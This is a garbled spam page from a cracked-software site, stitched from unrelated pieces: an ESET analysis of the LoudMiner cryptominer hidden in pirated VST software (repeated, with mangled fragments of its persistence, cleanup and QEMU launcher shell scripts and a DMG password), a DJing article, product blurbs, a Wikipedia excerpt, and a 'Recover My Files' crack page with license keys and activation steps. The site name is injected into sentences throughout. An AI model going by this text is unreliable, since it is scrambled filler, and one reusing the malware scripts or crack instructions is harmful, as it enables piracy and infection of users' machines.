Ableton Live Download Archives - Malik Softs

Ableton Live Download Archives - Malik Softs

Tag: Ableton Live Serial Key. November 10, 2021 Editor / software · Ableton Live 11.0.12 Crack + Keygen {Mac+Win} Free Download. Download Crack Ableton Live. It uses virtualization software to mine Monero on a Tiny Core the problem was that Ableton Live 10, which I have downloaded it from a. That's more than 350 issues and 25,000 pages of underground and experimental music history – a unique archive containing issues of the magazine that in some.

Bad taste: Ableton Live Download Archives - Malik Softs

Ableton Live Download Archives - Malik Softs
Power NinjaTrader 8.0.24.3 License Key With Crack Free Download
Ableton Live Download Archives - Malik Softs
Prota structure 2020 software download keygen,serial
WinToFlash Professional 1.13.0000 Full Version Download

Similar video

Ableton Live 10 Crack + Key 2021 Free Download

LoudMiner Cryptominer Uses Linux Image and Virtual Machines

An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine – a unique approach, according to researchers.

Virtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking Ableton Live Download Archives - Malik Softs packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.

Upon downloading, an unwitting audiophile’s computer would be infVirtual Studio Technology (VST)ected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine, Ableton Live Download Archives - Malik Softs. So far, three Mac versions and one Windows variant of the malware have been uncovered.

“Regarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,” wrote Michal Malik, researcher at ESET, in a posting on Thursday. “Thus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.”

Because the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.

“These applications are usually complex, so it is not unexpected for them to be huge files,” Malik explained. “The attackers use this to their advantage to camouflage their virtual machine (VM) images.”

Despite the efforts at camouflage, victims quickly become aware that something’s amiss, thanks to system slowdowns, according to forum postings.

“Unfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,” said a user named “Macloni.”

“The same user attached screenshots of the Activity Monitor indicating 2 processes – qemu-system-x86_64 and tools-service – taking 25 percent of CPU resources and running as root,” said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.

Using a Virtual Machine

LoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM – more specifically, it’s a Tiny Core Linux 9.0 image configured to run XMRig. The victim’s machine is added to a mining pool that the Linux image uses for CPU power.

Malik noted that that the decision by the malware authors to use VMs for Ableton Live Download Archives - Malik Softs the mining instead of hosting it locally on the victim’s computer is “quite remarkable and this is not something we routinely see” – although it’s not unheard of for legitimate miners to deploy the strategy to save money.

“User downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,” he explained. “LoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and the mining starts. Scripts inside the virtual machine can contact the C2 server to update the miner.”

He said that in order to identify a particular mining session, a file containing the IP address of the machine and the day’s date is created by the “idgenerator” script and its output is sent to the C2 server by the “updater.sh script.”

Because LoudMiner uses a mining pool, it’s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.

To avoid the threat, age-old advice applies: Don’t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, “additional” installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).

 

Источник: [https://torrent-igruha.org/3551-portal.html]
49-Key USB MIDI Keyboard Controller with X/Y Touch Pad (16 Drum Pads / 9 Faders / 8 Encoders), VIP Software Download Included

Assignable Controllers

Extensive assignable parameter control is a breeze with multiple banks of faders, knobs, buttons, wheels and pads. New is the X/Y Touchpad, which provides direct interaction with effects and plugins.

Serious Production Power

Code supports Mackie Control/HUI control modes right out of the box. Additionally, it also supports ASCII/HID keyboard shortcut commands. Mapping to your favorite DAW has never been so easy.

VIP 3.1 Integration

Ableton Live Download Archives - Malik Softs VIP provides you with unparalleled access to your virtual instrument and effect collection, seamlessly integrating the hardware / software experience and grants the unrestricted freedom to create in a user-friendly, intuitive format.

All New Keyboard Editor

Download the free Code MIDI Editor to unlock the true potential of your Code 49. This MIDI editor is a powerful preset management software that lets users customize their hardware and software setup on their computer. Ableton Live Download Archives - Malik Softs [https://torrent-igruha.org/3551-portal.html]

Ableton Live

I started DJing with Ableton Live after a couple of decades of playing out on CDJs and 1210s. I also own Traktor Pro 2 and I play out using Serato with vinyl too, so I’m certainly well placed to understand all the ups and downs of Ableton DJing – of which there are many of both! I should also add that for me the glass is always half full, and half the fun of a Scalextric was building the track itself!

As the creator of Isotonik and Oktopad, which are software templates for the Akai APC40 and Novation Launchpad respectively that work with Ableton Live via Max4Live, I believe I’ve created two tools that makes DJing with Ableton Live more Ableton Live Download Archives - Malik Softs and more fun – especially if like most DJs you come from the kind of background above. In this article, I’ll go through some of the philosophy behind my products, and look at specific ways they can help you to tame Ableton Live for DJing.

My take on DJing

For the traditional DJ, the Registry Winner v6.2.2.28 crack serial keygen of Serato and Traktor are many. Personally, I was first attracted to the ability to carry my entire record collection in a single bag (my gym membership lapsed many years ago and my back isn’t what it used to be…). But I also embrace wholeheartedly all the new technology. Looping actions, doubling up tracks at the click of a button, cue-point juggling and bewildering effects can all add to the DJ’s ability to entertain a crowd. Some will use these subtly, while others have created whole genres out of making tracks unrecognisable from their original forms (check out Kutski or Kissy Sell Out on YouTube to hear what I mean).

(Incidentally, on the whole beatmatching thing, Ableton Live Download Archives - Malik Softs, I’ve seen DJs who can and who can’t beatmatch both rock a crowd and fall flat. So I don’t care much for the argument that you have to know how to beatmatch to be able to DJ; you have to know how to DJ to be a DJ, and that for me is about being able to build a vibe and read a crowd. Glad to get that off my chest!)

So anyway, if Traktor and Serato can help you to do all of this, why consider Ableton Live in the first place? Serato Scratch Live can give you the real true vinyl feel, while Traktor is a Midi programmer’s dream. Surely between them they are all the digital DJ needs? Well not quite, as it turns out.

The Ableton advantage

Here are just a few benefits of DJing with Ableton Live:

  • User configurability – One of Ableton’s most appealing features. For instance, how about being able to create endless effects chains to distort or enhance your audio and possibly even create an effect never heard before?
  • Remixing your tracks live – If you’re a producer then you can reproduce your tracks in stems and mix them live. In this field there’s actually no competition for Ableton Live
  • Rearranging and perfectly phrasing every mix on the fly – As a DJ, Ableton’s Session mode can be hard to beat, giving far more possibilities than two or four decks. (Performance missing impact? Just trigger a white noise sample and filter out the lows until the bass kicks in…) True, Traktor and Serato have sample players, but nothing can beat Ableton’s practically infinite number of tracks
Isotonik in action on the Akai APC40.

Matched up with the right controller (buttons are important for triggering tracks, and encoders and faders are necessary for effects, so consider an APC40 or Launchpad / iPad combination; even a couple of Nano-style controllers can give you a full set-up from a backpack) and you can create a truly unique performance.

So where does Ableton lose out to its DJ controller and DVS cousins, and how can Max4Live along with my products help reduce that disadvantage? Let’s look Ableton Live Download Archives - Malik Softs that question.

Ableton’s main shortcomings

There are two big shortcomings to Ableton that crop up again and again, but both can actually be seen in a positive light.

Warping
With an Ableton session you first have to “warp” all of the tracks you want to play (think beatgridding in Traktor or Serato). While things got simpler with Live 8’s new warping methodology, some users still complain that this isn’t as automatic as, say, Serato’s system which seems to hit the downbeat each and every time without much effort.

However, those of you who have been DJing for a number of years will recognise the benefit of knowing your tracks inside out. Initially the process of warping involves listening to your tracks a number of times, which has to be good for your DJing – and anyway, with a Ableton Live Download Archives - Malik Softs experience a track can be warped in no more time than it takes to listen to it.

The browser
No question, Ableton’s browser is currently lacking. It’s small, and slow to respond to search requests. After a night smashing tune after tune out of Serato you’ll yearn for the simplicity of its browser and meta tag searching.

Ableton Live's browser

There are workarounds and some are ingenious in their approach but these feel more like hacks rather than a streamlined integrated solution. So instead many DJs choose to create a large template, containing every tune they think they’re going to be playing! Preparing such a template feels a little bit like packing a crate of tunes for a DJ session.

But when you come to think of it, focusing on your set before you turn up (just like vinyl DJs used to when packing a crate for the night) can actually be a very good thing.

Using Ableton Live with Max4Live

OK so we’ve coped with the shortcomings, Ableton Live Download Archives - Malik Softs, realised the benefits, and we’re ready to start pushing the envelope with our DJing, doing things that leave the Traktor and Serato boys way behind. Here’s where Max4Live along with my software for the APC40 and Novation Launchpad helps you to better use Ableton Live as a DJ.

Max for Live is best seen as a toolkit for adding new behaviours to Ableton Live. My procuts – Isotonik and Oktopad – are templates for the Akai APC40 and Novation Launchpad that use this toolkit to put some pretty cool stuff in your hands.

Easier DJing with parts and sections
Ableton guru Tom Cosm championed what he called his “megaset” DJing principle, where each full track is split into its relevant parts – intro, drums, break, vocal etc. This is a popular way of using Ableton Live for DJing, as you can really get stuck into remixing on the fly, get a visible indication of where you are in a track, and have the ability to create infinite cue points.

Although Serato has just upped its game with the ability to name cue points, you’re limited to five in total, and while Traktor Pro 2.5 with the new Kontrol F1 controller again are nodding in Ableton’s direction, we have yet to see how that system will pan out. However, the downside of using Ableton this way comes when triggering the following clip. Currently you can set “follow actions” with Ableton within each clip, choosing from a number of defined actions to occur after a certain number of bars, beats and units from the clip initially started.

Megaset Principle

With a little bit of effort this can be done quickly but each clip needs to be set separately and if in the middle of a clip you decide to engage a loop then your follow action will occur at the originally set time regardless of the fact that the clip has not met its end.

So here’s where Max4Live comes in. It circumvents this limitation in Ableton, Ableton Live Download Archives - Malik Softs, by keeping an eye on where you actually are in a clip no matter what you’re doing and only triggering the next clip when you actually reach the end. No follow actions, no lengthy set up and the ability to perform looping within tracks!

Better looping
Ableton offers a great deal of configurability for Midi Mapping (not as much as Traktor admittedly, but easily equalled when using a third-party utility such as Bomes Midi Translator), Ableton Live Download Archives - Malik Softs. However much of what can be mapped relies on what is in focus.

For instance, you can map a Midi controller to set a loop start and end point and toggle the loop on and off; however, you can only do this on the clip that’s in focus, Ableton Live Download Archives - Malik Softs. therefore to loop a clip, you’d have to navigate to it first, unnecessary mouse-pushing which, in a dark venue and with a glowing screen can lead to that “just checking Facebook” look. Wouldn’t pressing a single button to set a four-bar loop be much more preferable?

Again, Ableton Live Download Archives - Malik Softs, Max4Live to the rescue! With Max4Live you can send message to hidden parameters. Once you understand the nuances of getting the message order right, it’s ultimately possible to set up on-the-fly looping for the eight tracks within the Novation Launchpad’s Clip Launch rectangle (the 8×8 grid of clips that can be triggered from the pads of the Launchpad), setting loops and halving, doubling and moving them with even more control than either Traktor or Serato.

Nudge, nudge…
Having each clip pre-warped, you’ll never have a clashed beat again! Well, almost…

Sometimes no matter how well you warp a clip it’ll just not sit right with another clip’s bassline or hi-hats. On a pair of turntables, jogwheels or touchstrips you’d just give the offending track a little nudge to bring things sonically back into line. Unfortunately, with Ableton it’s not as straightforward. While Ableton has a Midi-mappable set of nudge buttons, but like the looping functionality you can only nudge the clip in focus. Plus, it will also only perform a nudge in the size of the current Global Launch quantize.

The Novation Launchpad

Once again, the, you’ve got multiple button presses to contend with: Change quantization to none, focus on clip and then nudge. All a far cry from reaching out your right hand and holding two fingers against the platter of a 1210…

But once again, Max4Live to the rescue! By sending a simple message to the playing clip with a value of 0.01 you’ll be back to one physical action to achieving the nudging result – just like the + and – buttons on a Denon CD player.

Here’s a bonus: Ever started a track a bar too late or early? Well simply ask Max4Live to jump forwards or back a bar! Again, it’s simple, one-click stuff.

Mixing in key
Many digital musicians love mixing in key, analysing their music files for key and colour coding them in Ableton according to the Camelot wheel for easy harmonic mixing and mashups, Ableton Live Download Archives - Malik Softs. Well for them, the ability of Max4Live to be change the pitch of a clip on the fly brings brand new mashup possibilities to the fore, Ableton Live Download Archives - Malik Softs, with an endless number of accapellas now becoming suitable to lay over virtually any instrumental.

Finally…

I made Isotonik and Oktopad because I love the creative possibilities of Ableton Live but wanted to address some of these very real concerns that DJs moving across from other systems have with the program. However, it’s not for everyone. Ableton is still a far cry from two-decks-and-a-mixer, Ableton Live Download Archives - Malik Softs. Hopefully Max4Live with the APC40 or Launchpad and my templates makes it easier and more fun, but the truth is, you’ll never finish building your source tunes template, and with this and other issues, it’ll own your life, ruin your relationships, and see you end up with friends that you only recognise through their avatar on a forum!

I can’t do anything about all of that, I’m afraid – and I can’t bring parallel waveforms back for you, either. Apart from that, though, for the adventurous DJ, Ableton Live Download Archives - Malik Softs, Ableton Live plus Max4Live with Isotonik and/or Oktopad, does, in my opinion, Ableton Live Download Archives - Malik Softs, present the most powerful DJing platform out there today.

• Isotonik and Oktopad are fully featured templates for the Akai APC40 and Launchpad respectively. Subscribers benefit from a steady dream of updates as new functionality is requested and realised. More details and videos can be found at Darren’s website, and subscribers can get involved on his Facebook Page.

Have you tried or considered Ableton Live DJing? Do you currently DJ with Ableton Live? What are your experiences of Ableton, Max4Live, or Darren’s templates? Please share your thoughts in the comments.

Источник: [https://torrent-igruha.org/3551-portal.html]

LoudMiner: Cross‑platform mining in cracked VST software

The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS

LoudMiner is an unusual case of a persistent cryptocurrency miner, distributed for macOS and Windows since August 2018. It uses virtualization software – QEMU on macOS and VirtualBox on Windows – to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. It comes bundled with pirated copies of VST software. Ableton Live Download Archives - Malik Softs miner itself is based on XMRig (Monero) and uses a mining pool, thus it is impossible to retrace potential transactions.

At the time of writing, there are 137 VST-related applications Ableton Live Download Archives - Malik Softs for Windows and 95 for macOS) available on a single WordPress-based website with a domain registered on 24 August, 2018. The first application – Kontakt Native Instruments 5.7 for Windows – was uploaded on the same day. The size of the apps makes it impractical to analyze them all, but it seems safe to assume they are all Trojanized.

The applications themselves are not hosted on the WordPress-based site, but on 29 external servers, which can be found in the IoCs section. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner.

Regarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production; thus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users. Also, these applications are usually complex, so it is not unexpected for them to be huge files. The attackers use this to their advantage to camouflage their VM images. Moreover, the decision to use virtual machines instead of a leaner solution is quite remarkable and this is not something we routinely see.

Here are some examples of applications, as well as some comments you can find on the website:

  • Propellerhead Reason
  • Ableton Live
  • Sylenth1
  • Nexus
  • Reaktor 6
  • AutoTune

Figure 1. Comment #1 from the “admin

Figure 2. Comment #2 from the “admin”

We found several forum threads of users complaining about a qemu-system-x86_64 process taking 100% of their CPU on their Mac:

Figure 3. User report #1 (https://discussions.apple.com/thread/250064603)

Figure 4. User report #2 (https://toster.ru/q/608325)

A user named “Macloni” (https://discussions.apple.com/thread/8602989) said the following:

“Unfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at Ableton Live Download Archives - Malik Softs background causing this.” The same user attached screenshots of the Activity Monitor indicating 2 processes – qemu-system-x86_64 and tools-service – taking 25% of CPU resources and running as root.”

The general idea of both macOS and Windows analyses stays the same:

  1. An application is Ableton Live Download Archives - Malik Softs with virtualization software, a Linux image and additional files used to achieve persistence.
  2. User downloads the application and follows attached instructions on how to install it.
  3. LoudMiner is installed first, the actual VST software after.
  4. LoudMiner hides itself and becomes persistent on reboot.
  5. The Linux virtual machine is launched and the mining starts.
  6. Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries).

While analyzing the different applications, we’ve identified four versions of the miner, mostly based on how it’s bundled with the actual software, the C&C server domain, and something we believe is a version string created by the author.

macOS

We’ve identified three macOS versions of this malware so far. All of them include dependencies needed to run QEMU in installerdata.dmg from which all files are copied over to /usr/local/bin and have appropriate permissions set along the way. Each version of the miner can run two images at once, each taking 128 MB of RAM and one CPU core. Persistence is achieved by adding plist files in /Library/LaunchDaemons with RunAtLoad set to true. They also have KeepAlive set to true, ensuring the process will be restarted if stopped. Each version has these components:

  1. QEMU Linux images.
  2. Shell scripts used to launch the QEMU images.
  3. Daemons used to start the shell scripts at boot and keep them running.
  4. A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running.

The CPU monitor script can start and stop the mining by loading and unloading the daemon. If the Activity Monitor process is running, the mining stops. Otherwise, it checks for how long the system has been idle in seconds:

1

ioreg-cIOHIDSystem

The Wire

Every back issue of The Wire is now available to all our subscribers online and via the iPad, iPhone and Android apps. That’s more than 350 issues and 25,000 pages of underground and experimental music history – a unique archive containing issues of the magazine that in some cases have been unavailable for up to three decades.

Up until now, subscribers have only been able to access monthly digital editions of the magazine going back to August 2006 – now they can view and read every issue going back to issue one and summer 1982. The entire archive is searchable, of course, so you can locate any and every article and review ever published by the magazine on specific musicians, groups or genres, or by key critics and contributors.

The Wire archive will be an essential resource for anyone who's into underground music, one that will continue to expand as each new issue of the magazine is added to it.

If you order a print subscription you get automatic access to the digital archive. Digital-only subscriptions are also available. For more details and prices click here.

Comments are closed for this article

Источник: [https://torrent-igruha.org/3551-portal.html]
Ableton Live Download Archives - Malik Softs

Ableton Live Download Archives - Malik Softs - seems

The Wire

Every back issue of The Wire is now available to all our subscribers online and via the iPad, iPhone and Android apps. That’s more than 350 issues and 25,000 pages of underground and experimental music history – a unique archive containing issues of the magazine that in some cases have been unavailable for up to three decades.

Up until now, subscribers have only been able to access monthly digital editions of the magazine going back to August 2006 – now they can view and read every issue going back to issue one and summer 1982. The entire archive is searchable, of course, so you can locate any and every article and review ever published by the magazine on specific musicians, groups or genres, or by key critics and contributors.

The Wire archive will be an essential resource for anyone who's into underground music, one that will continue to expand as each new issue of the magazine is added to it.

If you order a print subscription you get automatic access to the digital archive. Digital-only subscriptions are also available. For more details and prices click here.

Comments are closed for this article

Источник: [https://torrent-igruha.org/3551-portal.html]

LoudMiner: Cross‑platform mining in cracked VST software

The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS

LoudMiner is an unusual case of a persistent cryptocurrency miner, distributed for macOS and Windows since August 2018. It uses virtualization software – QEMU on macOS and VirtualBox on Windows – to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. It comes bundled with pirated copies of VST software. The miner itself is based on XMRig (Monero) and uses a mining pool, thus it is impossible to retrace potential transactions.

At the time of writing, there are 137 VST-related applications (42 for Windows and 95 for macOS) available on a single WordPress-based website with a domain registered on 24 August, 2018. The first application – Kontakt Native Instruments 5.7 for Windows – was uploaded on the same day. The size of the apps makes it impractical to analyze them all, but it seems safe to assume they are all Trojanized.

The applications themselves are not hosted on the WordPress-based site, but on 29 external servers, which can be found in the IoCs section. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner.

Regarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production; thus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users. Also, these applications are usually complex, so it is not unexpected for them to be huge files. The attackers use this to their advantage to camouflage their VM images. Moreover, the decision to use virtual machines instead of a leaner solution is quite remarkable and this is not something we routinely see.

Here are some examples of applications, as well as some comments you can find on the website:

  • Propellerhead Reason
  • Ableton Live
  • Sylenth1
  • Nexus
  • Reaktor 6
  • AutoTune

Figure 1. Comment #1 from the “admin

Figure 2. Comment #2 from the “admin”

We found several forum threads of users complaining about a qemu-system-x86_64 process taking 100% of their CPU on their Mac:

Figure 3. User report #1 (https://discussions.apple.com/thread/250064603)

Figure 4. User report #2 (https://toster.ru/q/608325)

A user named “Macloni” (https://discussions.apple.com/thread/8602989) said the following:

“Unfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this.” The same user attached screenshots of the Activity Monitor indicating 2 processes – qemu-system-x86_64 and tools-service – taking 25% of CPU resources and running as root.”

The general idea of both macOS and Windows analyses stays the same:

  1. An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence.
  2. User downloads the application and follows attached instructions on how to install it.
  3. LoudMiner is installed first, the actual VST software after.
  4. LoudMiner hides itself and becomes persistent on reboot.
  5. The Linux virtual machine is launched and the mining starts.
  6. Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries).

While analyzing the different applications, we’ve identified four versions of the miner, mostly based on how it’s bundled with the actual software, the C&C server domain, and something we believe is a version string created by the author.

macOS

We’ve identified three macOS versions of this malware so far. All of them include dependencies needed to run QEMU in installerdata.dmg from which all files are copied over to /usr/local/bin and have appropriate permissions set along the way. Each version of the miner can run two images at once, each taking 128 MB of RAM and one CPU core. Persistence is achieved by adding plist files in /Library/LaunchDaemons with RunAtLoad set to true. They also have KeepAlive set to true, ensuring the process will be restarted if stopped. Each version has these components:

  1. QEMU Linux images.
  2. Shell scripts used to launch the QEMU images.
  3. Daemons used to start the shell scripts at boot and keep them running.
  4. A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running.

The CPU monitor script can start and stop the mining by loading and unloading the daemon. If the Activity Monitor process is running, the mining stops. Otherwise, it checks for how long the system has been idle in seconds:

1

ioreg-cIOHIDSystem wc-l`

if[$LGC-ge2]

Then

launchctl unload-w/Library/LaunchDaemons/com.modulesys.qemuservice.plist

launchctl unload-w/Library/LaunchDaemons/com.buildtools.tools-service.plist

launchctl unload-w/Library/LaunchDaemons/com.buildtools.system-monitor.plist

launchctl unload-w/Library/LaunchDaemons/com.systools.cpumonitor.plist

rm-f/Library/LaunchDaemons/com.buildtools.system-monitor.plist

rm-f/Library/LaunchDaemons/com.modulesys.qemuservice.plist

rm-f/Library/LaunchDaemons/com.buildtools.tools-service.plist

rm-f/Library/LaunchDaemons/com.systools.cpumonitor.plist

rm-rf/Library/Application\Support/.Qemusys

rm-rf/usr/local/bin/.Tools-Service

rm-rf/Library/Application\Support/.System-Monitor/

rm-rf/usr/local/*

fi

exit0

}

clear;

Script 2. data_installer.pkg preinstall script that removes version 1

The following temporary files are created:

  • /Users/Shared
    • z1 – QEMU binary
    • z1.daemon – launches the QEMU image with the QEMU binary
    • z1.qcow2 – QEMU image
    • z1.plist – launches z1.daemon
    • z3 – CPU monitor script, little change from version 1 cpumonitor
    • z3.plist – used to launch z3
    • randwd – generates random names

After dependencies are copied over, the miner is installed. This time the names of QEMU binaries, plists and directories are randomized with the randwd script. The miner installation creates two copies of z1, z1.daemon, z1.qcow2 and z1.plist. For each copy, the following happens:

  • A directory with a random name is created in /Library/Application Support
  • The QEMU binary z1 carries the same name as the directory and is copied into /usr/local/bin
  • z1.daemon (see listing in Script 3) and z1.qcow2 are copied into this directory under their random names
  • z1.plist is copied with the name com.<random_name>.plist into /Library/LaunchDaemons

z1.daemon, z1.plist, z3 and z3.plist files serve as templates. References to other scripts, binaries, plists, etc. in these files are replaced by their corresponding generated random name.

A random name is also chosen for the CPU monitor (z3) shell script and its accompanying plist file. z3 is copied into /usr/local/bin and the plist into /Library/LaunchDaemons under the name com.<random_name>.plist.

#!/bin/bash

functionstart{

pgrep"Activity Monitor"

if[$?-eq0];then

launchctl unload-w/Library/LaunchDaemons/com.AAAA.plist

else

/usr/local/bin/BBBB-Maccel=hvf--cpu host/Library/Application\Support/CCCC/DDDD-display none

fi

}

start;

Script 3. z1.daemon shell script

Version 2 is a bit cleaner and/or simpler than version 1. There is only one QEMU image, with two copies made; same for the image launcher scripts, daemons and the cpumonitor. Even though version 2 randomizes its filenames and directories, it can only be installed once because the installation checks for running processes with accel=hvf in their command line.

From the version 2 applications we’ve checked so far, the SHA1 hash of the data_installer.pkg is always 39a7e86368f0e68a86cce975fd9d8c254a86ed93.

Version 3

The miner files are in an encrypted DMG file, called do.dmg, inside the application package. The DMG is mounted with the following command:

1

printf'%s\0''VeryEasyPass123!'

Recover My Files 6.3.2.3 Crack With Torrent Download (New) 2022

Generally, the Recover My Files License Key is useful in two basic information misfortune circumstances. Lots of information is lost in view of sudden accidents and the other is reformatted the drive. In the two cases, this program works snappier and gives 100% quality by keeping up the original quality. This application runs incredibly to recover information with no concern of archive type from reformatted hard drives. Recover information from all setups beginning from jpg, doc, mp3, pst, Xls, and so forth. 

This is the convinced at this point made sure about information recovery application that is accommodating to handle all the information misfortune issues. Moreover, it is accessible for recovery of an assortment of files and single-record recovery including the undertaking reports, and important messages. Recover My Files Crack has extraordinary abilities to get everything that is no more. Exceptionally, it gets a short ideal opportunity to scan the entire framework, and furthermore, you can delay them or restart the scanning at whatever point you required.


Effective and Useful Features:

Fast Scanning: 

  • It begins scanning to find everything that is lost because of many reasons like an abrupt crash, framework disappointment, and infection assaults, and so on.

Upheld Devices: 

  • As the best recovery application, it presents an easy technique to recover the information from the range of the gadget. Thus, get back information from the camera card, hard drives, USB, iPod, floppy plate, and many others.

UI: 

  • This is the best element that enhances the certainty of the client while working. Well settled interface with all the required tools that are the information recovery. 

Fats Recovery: 

  • The product magnificently works with a decent speed. So no compelling reason to confront the boring or extensive recovery system. Simply install the most recent variant from here and appreciate the fast recovery of all sorts of files. 

Circle recovery: 

  • Recover My Files Torrent is completely accessible to recover the information even in case of a hard plate crash.

Some Others Features:

  • Recover My Files Full Crack also support the Multi-screen.
  • Arrange the various files according to their size, date, and attributes.
  • Improvements to Save as well as load the custom screen formats.
  • Recuperate the memorable photos, birthday videos, messages, and call history.
  • An excellent option is here to recover from the RAW hard drives.
  • Also, the interesting thing is that it can recuperate the business email.
  • Supports to get back data from the NTFS, FAT, HFS, exFAT, HFS, and much more.
  • Get back data even you have the emptied recycle bin.
  • Recover any type of data in case of partition error.

What’s New?

  • Enhanced recovery partition recovery
  • Improvements for the validation of invalid or duplicate data
  • Enhanced speed to save of load the resulted contents
  • A lot of improvements in the user interface
  • Possibility to view the group data with the current date, extension, and status
  • Examine the raw data in hexadecimal and text views
  • Supports the 300+ file types

System Requirements:

  • 1 GHz processor for good performance
  • 512 MegaBytes RAM
  • A free disk space of approximately 50 MB for installation
  • Windows 7, 8, 8.1, and 10 with 32/64 Bit system

Recover My Files License Key 2022:

DFTVHJNMRDHKYFSMJKIU

MKIVGFCFSTTESXCXZSAEN

UTGFTRDESABDSAAWDXXU

How to Activate?

  • Download Recover My Files Crack from the link on the page,
  • Run the setup file and let Recover My Files Crack install
  • After installation, open the installation folder,
  • Copy the crack folder and move to Recover My Files in the installation,
  • Use the Crack to unlock the premium features,
  • Now Enjoy Recover My Files full and free version.
Источник: [https://torrent-igruha.org/3551-portal.html]

M-Audio Code 49

Wikipedia

Multilingual free online encyclopedia

This article is about Wikipedia. For Wikipedia's home page, see Main Page. For the English edition, see English Wikipedia. For a list of Wikipedias in other languages, see List of Wikipedias. For other uses, see Wikipedia (disambiguation).

Wikipedia (wik-ih-PEE-dee-ə or wik-ee-) is a free content, multilingual online encyclopedia written and maintained by a community of volunteers through a model of open collaboration, using a wiki-based editing system. Individual contributors, also called editors, are known as Wikipedians. It is the largest and most-read reference work in history,[3] and consistently one of the 15 most popular websites ranked by Alexa; as of 2021,[update] Wikipedia was ranked the 13th most popular site.[3][4] A visitor spends an average time on Wikipedia of 3 minutes and 45 seconds each day.[5] It is hosted by the Wikimedia Foundation, an American non-profit organization funded mainly through small donations.[6]

Wikipedia was launched on January 15, 2001, by Jimmy Wales[7] and Larry Sanger; Sanger coined its name as a blending of "wiki" and "encyclopedia".[8] Initially available only in English, versions in other languages were quickly developed. Its combined editions comprise more than 57 million articles, attracting around 2 billion unique device visits per month, and more than 17 million edits per month (1.9 edits per second).[10][11] In 2006, Time magazine stated that the policy of allowing anyone to edit had made Wikipedia the "biggest (and perhaps best) encyclopedia in the world", and is "a testament to the vision of one man, Jimmy Wales".[12]

Wikipedia has received praise for its enablement of the democratization of knowledge, extent of coverage, unique structure, culture, and reduced amount of commercial bias, but criticism for exhibiting systemic bias, particularly gender bias against women and alleged ideological bias.[13][14]Its reliability was frequently criticized in the 2000s, but has improved over time and has been generally praised in the late 2010s and early 2020s.[3][13][15] Its coverage of controversial topics such as American politics and major events such as the COVID-19 pandemic has received substantial media attention. It has been censored by world governments, ranging from specific pages to the entire site. It has become an element of popular culture, with references in books, films and academic studies. In 2018, Facebook and YouTube announced that they would help users detect fake news by suggesting fact-checking links to related Wikipedia articles.[16][17]

History

Main article: History of Wikipedia

Nupedia

Main article: Nupedia

Logo reading "Nupedia.com the free encyclopedia" in blue with the large initial "N"
Wikipedia originally developed from another encyclopedia project called Nupedia.

Other collaborative online encyclopedias were attempted before Wikipedia, but none were as successful.[18] Wikipedia began as a complementary project for Nupedia, a free online English-language encyclopedia project whose articles were written by experts and reviewed under a formal process.[19] It was founded on March 9, 2000, under the ownership of Bomis, a web portal company. Its main figures were Bomis CEO Jimmy Wales and Larry Sanger, editor-in-chief for Nupedia and later Wikipedia.[1][20] Nupedia was initially licensed under its own Nupedia Open Content License, but even before Wikipedia was founded, Nupedia switched to the GNU Free Documentation License at the urging of Richard Stallman.[21] Wales is credited with defining the goal of making a publicly editable encyclopedia,[22][23] while Sanger is credited with the strategy of using a wiki to reach that goal.[24] On January 10, 2001, Sanger proposed on the Nupedia mailing list to create a wiki as a "feeder" project for Nupedia.[25]

Launch and early growth

The domainswikipedia.com (later redirecting to wikipedia.org) and wikipedia.org were registered on January 12, 2001,[26] and January 13, 2001,[27] respectively, and Wikipedia was launched on January 15, 2001[19] as a single English-language edition at www.wikipedia.com,[28] and announced by Sanger on the Nupedia mailing list.[22] Its policy of "neutral point-of-view"[29] was codified in its first few months. Otherwise, there were initially relatively few rules, and it operated independently of Nupedia.[22] Bomis originally intended it as a business for profit.[30]

The Wikipedia home page on December 20, 2001

English Wikipedia editors with >100 edits per month[31]

